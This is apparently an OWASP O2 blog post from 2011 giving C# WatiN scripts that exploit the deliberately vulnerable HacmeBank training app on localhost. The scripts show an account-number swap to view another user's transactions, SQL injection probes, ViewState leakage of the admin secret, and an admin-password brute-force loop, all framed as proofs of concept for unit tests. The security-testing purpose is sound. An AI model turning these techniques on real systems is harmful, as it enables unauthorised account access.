OWASP O2 Platform Blog

HacmeBank – Unit Tests for Vulnerabilities

The following examples show how to create automated exploits and PoCs (to be later transformed into unit tests) for HacmeBank’s vulnerabilities

This code uses O2’s WatiN integration to create an easy ‘IE automation’ scripting environement

Install and confirm we can login

After Installing HacmeBank and run the following script that will confirm if we are logged in:

var ie = "about:black".ie(0,500,750,500);
 
ie.open("http://localhost:58348/HacmeBank_v2_Website");
ie.field("txtUserName").value("jm");
ie.field("txtPassword").value("jm789");
ie.button("Submit").click();

Vulnerability:User A is able to see User’s B account details

var ie = "about:black".ie(0,500,750,500);
 
ie.open("http://localhost:58348/HacmeBank_v2_Website");

ie.field("txtUserName").value("jm");
ie.field("txtPassword").value("jm789");
ie.button("Submit").click();
 
ie.link("My Accounts").click();
ie.link("View Transactions").click();  
 
var url = ie.url();
var payload = url.replace("5204320422040003","5204320422040001");
ie.open(payload);
 
ie.closeInNSeconds(20);

Vulnerability:Sql Injection in Login page

public void vulnerability_Sql_Injection_in_Login_page()
{
    setup(); 
    Browser.open(StartUrl); 
    Browser.field("txtUserName").value("jv ' aaa").flash();
    Browser.field("txtPassword").value("jv789").flash();
    Browser.button("Submit").flash().click();
}

Vulnerability:Sql Injection in Accounts Details page

[Test]
public void vulnerability_Sql_Injection_in_Accounts_Details_page()
{
    setup(); 
    Browser.open(StartUrl); 
    Browser.field("txtUserName").value("jv").flash();
    Browser.field("txtPassword").value("jv789").flash();
    Browser.button("Submit").flash().click();
    Browser.link("My Accounts").flash().click();
    Browser.link("View Transactions").flash().click(); 
    Browser.open(Browser.url()+"' AAAAA ");            
}

Vulnerability: Sensitive Information Disclosure in Admin Section Login

[Test]
public void vulnerability_Sensitive_Information_Disclosure_in_Admin_Section()
{
    setup(); 
    Browser.open(StartUrl); 
    Browser.field("txtUserName").value("jv").flash();
    Browser.field("txtPassword").value("jv789").flash();
    Browser.button("Submit").click();
    Browser.link("Admin Section").flash().click();                    
 
    var response = Browser.viewState().ViewState_Values[12];
 
    Browser.field("_ctl3:txtResponse").value(response).flash();           
    Browser.button("Login").flash().click();
}

Script: Fuzzing Admin password

panel.clear();
var topPanel = panel.add_Panel();
 
var ie = topPanel.add_IE().silent(true);
var startPage = "http://localhost:58915/HacmeBank_v2_Website/aspx/login.aspx";
Action<string> adminLogin =
    (password)=>{
            ie.open(startPage);
            ie.disableFlashing();
            ie.field("txtUserName").value("jv").flash();
                        ie.field("txtPassword").value("jv789").flash();
                        ie.button("Submit").click();
                        ie.link("Admin Section").flash().click();    
            //var secret = ie.viewState().ViewState_Values[12];             
            ie.field("_ctl3:txtResponse", password);
            ie.button("Login").click();
            //Add logic to detect admin Login
        };
 
for(int i =0 ; i < 10 ; i ++)
    adminLogin("admin" + i);       
 
//O2File:WatiN_IE_ExtensionMethods.cs
//using O2.XRules.Database.Utils.O2
//O2Ref:WatiN.Core.1x.dll

July 27, 2011 Posted by | HacmeBank, IE Automation, WatiN | Leave a comment